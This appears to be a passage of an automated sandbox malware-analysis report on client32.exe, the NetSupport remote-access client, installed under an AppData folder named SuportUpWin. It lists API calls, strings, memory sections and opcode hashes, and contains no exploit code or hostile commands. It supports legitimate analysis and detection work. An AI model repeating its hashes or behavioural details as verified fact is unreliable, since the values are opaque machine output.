                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1314093303-0
                                                                                                                • Opcode ID: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                                • Instruction ID: 29ddb86f1ee71f4f843e45b5762510f7855215705a57359ad908d625b59217dc
                                                                                                                • Opcode Fuzzy Hash: aa088434d08b51544ea5abea5962b85dc1652b22456a7587c6afef069addc8bc
                                                                                                                • Instruction Fuzzy Hash: DEF08135E0521ACFDB14DFA5D998BADF774EF84319F0041A9D52A53680DF346540CB40
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe, xrefs: 11144804, 11144812
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CurrentFileModuleNameProcess
                                                                                                                • String ID: C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                                • API String ID: 2251294070-1743495995
                                                                                                                • Opcode ID: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
                                                                                                                • Instruction ID: b68e03ccdc6c4a6a2c274322f8faab7020ac6906b57b96b3185223f9365e196b
                                                                                                                • Opcode Fuzzy Hash: 751681083fa28ab0273cb23fb616810117bb1d4aec001fef4099e21270a1e4b8
                                                                                                                • Instruction Fuzzy Hash: BE11CEB87803539BF704DFA5C9A4B19FBA4AB41B18F20883DE919D7E85EB71E444C780
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __strdup
                                                                                                                • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                                                • API String ID: 838363481-1175285396
                                                                                                                • Opcode ID: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                                                • Instruction ID: 29c62dc5338ff495c898086ff50a52fd619e2258fc3847dfd771a07a915be9b0
                                                                                                                • Opcode Fuzzy Hash: 7244959e6880bffd10a273b22dd5c93d76c3f537a87f38f753278ccf60d995ca
                                                                                                                • Instruction Fuzzy Hash: 95F028B5E003525BEA00DE6AB804A9BFBD89FC2298F44847AE8DDE7311E570B405C6D4
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 11110239
                                                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                • _memset.LIBCMT ref: 11110262
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                                • String ID: ..\ctl32\Refcount.cpp
                                                                                                                • API String ID: 2803934178-2363596943
                                                                                                                • Opcode ID: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                                                • Instruction ID: d1439471c86646bb150eb9b523f3ee6c48551de281bd1a8bb162c90cccd05cf0
                                                                                                                • Opcode Fuzzy Hash: fdaee9942ff38bbfc9813524ff7dbe738d4946ee88f5f3b78065bcb716d44a09
                                                                                                                • Instruction Fuzzy Hash: 68E0126AF8062533C511259A6C02FDFF75C8FD2AF9F040031FE0DBA251A596A95181E6
                                                                                                                APIs
                                                                                                                • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102F66A,MiniDumpType,000000FF,00000000,00000000), ref: 11015597
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,View,Client,Bridge), ref: 110155A8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateFileHandle
                                                                                                                • String ID: \\.\NSWFPDrv
                                                                                                                • API String ID: 3498533004-85019792
                                                                                                                • Opcode ID: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                • Instruction ID: 8ee41b20f4352974833a803ddfcebdd3f772c34de5b97fa52423d1e1393adc22
                                                                                                                • Opcode Fuzzy Hash: d572e8544444f97a5f3fc22a419c76dea4a94a774e22dfe6340fcb1249187ee5
                                                                                                                • Instruction Fuzzy Hash: 51D09271A410386AF27055A6AD48F87AD099B026B5F220260B939E658486104D4186E0
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _calloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1679841372-0
                                                                                                                • Opcode ID: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                • Instruction ID: 23015313aa3c4790eb0b31f5809972b43774ae16244dcdf9e0384501427d1f2b
                                                                                                                • Opcode Fuzzy Hash: 918923e0a1279dfc537c19a69b58c34981e358f5fb15b3a273ee7d5d1eaccc98
                                                                                                                • Instruction Fuzzy Hash: 7F519F3560021AAFDB90CF58CC80F9ABBB9FF89744F108559E929DB344D770EA11CB90
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CEF1E32,00000001,?,00000000,00000000,00000000,?,6CF175BC,00000001,00000214), ref: 6CEF09E8
                                                                                                                • _errno.MSVCR100(?,6CEF1E32,00000001,?,00000000,00000000,00000000,?,6CF175BC,00000001,00000214), ref: 6CF1F3D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710952050.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710934142.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711022108.000000006CF94000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711041416.000000006CF96000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711061539.000000006CF99000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6cee0000_client32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_errno
                                                                                                                • String ID:
                                                                                                                • API String ID: 242259997-0
                                                                                                                • Opcode ID: 1b551e25b4f457861c406c1681075db405b643f9a8a1deeeadb2b3e712310569
                                                                                                                • Instruction ID: b6efda4d40442e7e321e24ae1d67df3e587959b8c364b0f4373b70b99d81d560
                                                                                                                • Opcode Fuzzy Hash: 1b551e25b4f457861c406c1681075db405b643f9a8a1deeeadb2b3e712310569
                                                                                                                • Instruction Fuzzy Hash: 1701F53135A2D59BFF449F29C844B6B37B89F82359F208229A835CBDD1EB30D441C750
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                                                • __wsplitpath.LIBCMT ref: 11112185
                                                                                                                  • Part of subcall function 11169F04: __splitpath_helper.LIBCMT ref: 11169F46
                                                                                                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1847508633-0
                                                                                                                • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                                                • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                                                                • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                                                                • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                                                  • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                                                  • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,00EB2860,`(,?,00000001,00000001), ref: 1109EDB0
                                                                                                                  • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00EB2860,?,00000001,00000001), ref: 1109EDC3
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2256153495-0
                                                                                                                • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                                • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                                                                • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                                                                • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: ??CTL32.DLL
                                                                                                                • API String ID: 1029625771-2984404022
                                                                                                                • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                                • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                                                                • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                                                                • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                                                                APIs
                                                                                                                • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DriveType
                                                                                                                • String ID: ?:\
                                                                                                                • API String ID: 338552980-2533537817
                                                                                                                • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                                                                • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                                                • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                                                Strings
